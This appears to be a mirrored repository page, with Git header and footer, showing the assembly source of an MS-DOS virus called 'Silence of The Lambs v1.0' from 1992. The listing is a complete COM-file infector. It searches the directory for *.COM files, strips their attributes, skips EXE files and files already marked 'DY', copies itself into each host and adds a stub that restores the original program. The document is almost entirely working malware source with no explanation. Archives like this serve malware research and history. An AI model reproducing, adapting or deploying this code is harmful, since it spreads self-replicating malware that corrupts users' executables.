Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-30 19:02:32 +00:00
Code Releases Activity
6e867b6ce0
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm

166 lines
3.1 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-13 00:01:59 +00:00
; Silence of The Lambs v1.0
; (c) The Chronomancer of Demoralized Youth 1992
;
; First version : Thursday 27th of Febuary - 01:50 CET.
;
org 100h
jmp short dummy1
db 'DY'
dummy1:
mov cx,(100h-80h)/2 ;save command line on stack
mov si,80h
save_parm:
push [si]
inc si
inc si
loop save_parm
mov ah,4Eh
xor cx,cx
mov dx,offset file
int 21h
jc nomore
again:
cmp byte [9Eh],0FAh
jae more
call infect
more:
mov ah,4Fh
int 21h
jnc again
nomore:
mov cx,(100h-80h)/2
mov si,0FEh
rest_parm:
pop [si]
dec si
dec si
loop rest_parm
mov bx,0000h
eof equ $-2
jmp bx
file db '*.COM',0
infect:
mov bx,cs
mov si,cs
dec si
mov ds,si
cmp byte[0],'Z'
je ok_mark
jmp back2
ok_mark:
sub word [0003h],pgfsize
jnc ok_mark2
jmp back
ok_mark2:
mov ax,[0012h]
sub ax,pgfsize
push ax
mov ds,bx
mov ax,4301h
xor cx,cx
mov dx,80h+1Eh
int 21h
mov ax,3D02h
int 21h
xchg bx,ax
pop ds
push ds
mov cx,total
xor dx,dx
mov ah,3Fh
int 21h
cmp byte [0],'M' ;exe ?
je close
cmp byte [0],'Z' ;exe ?
je close
cmp word [2],'YD' ;allready infected?
je close
xor cx,cx
xor dx,dx
push cx
push dx
mov ax,4202h
int 21h
add ax,total+100h
mov cs:word [00FEh],ax
mov ah,40h
mov cx,total
xor dx,dx
int 21h
push cs
pop ds
mov ah,40h
mov cx,applen
mov dx,offset append
int 21h
mov ax,4200h
pop dx
pop cx
int 21h
push [eof]
mov ax,word [00FEh]
mov [eof],ax
mov ah,40h
mov dx,100h
mov cx,total
int 21h
pop [eof]
close:
mov ah,3Eh
int 21h
back:
pop ds ;(mov ds,si)
add word [0003h],pgfsize
back2:
push cs
pop ds
ret
append:
call $+3
pop si
sub si,3+total
mov di,100h
mov cx,total
rep movsb
mov ax,100h
push ax
ret
applen equ $-offset append
total equ $-100h ;size
pgfsize equ ($-100h)/16+2 ;paragraphs needed

Copy Permalink